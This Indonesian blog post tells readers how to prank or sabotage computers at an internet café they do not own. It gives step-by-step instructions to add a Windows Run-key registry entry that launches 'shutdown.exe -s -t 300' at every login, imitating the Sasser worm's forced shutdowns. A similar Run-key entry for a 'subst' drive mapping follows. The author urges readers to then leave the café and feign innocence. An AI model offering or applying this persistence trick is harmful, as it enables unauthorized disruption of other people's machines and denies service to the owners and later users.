Beranda > Komputer > starup sassser

starup sassser


Anda bisa menerapkan ini di komputer orang lain yang mau anda kerjain… hehehe
Adakalanya kita kesel saat berwarnet ria di rental,…atau mungkin kita punya segudang kekesalan dengan yang punya atau,..atau…atau seribu satu macam alasan anda,..dan anda terus berpikir dan berpikir gimana cara ngerjain nih warnet ,….oughhh
wuekkssss…!sekarang kita coba utak atik registry nya untuk memberikan sedikit kejutan padanya
Kita bikin Startup mirip Sasser,..buka notepad tercinta kita copy paste code ini simpan dengan ektensi.reg dan install then restart kompinya….wueksss
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run (efek untuk current user)
or: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (efek untuk seluruh user)
Buatlah string tipe REG_SZ, lalu beri nama apa saja. Di Value, ketikan:
Code:
shutdown.exe -s -t 300 -c “Pesan-pesan dari anda…”
Silahkan restart dan rasakan efeknya…
pergi ke cmd (windows+R>ketik “run” enter) lalu ketik shutdown -?
Membuat Shortcut Folder sebagai Harddrive(Virtual Drive)
Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run (efek untuk current user)
or: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (efek untuk seluruh user)
Buat string dengan nama apa saja, isikan di value:
Code:
subst [driveletter] [path]
Misal:
Code:
subst X: D:\Project
dan matikan kompi bayar warnetnya pasang muka bego langsung aja ngacir….emang enak..hi hihi
having fun
~jetz~

Kategori:Komputer Tag:
  1. Belum ada komentar.
  1. No trackbacks yet.

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s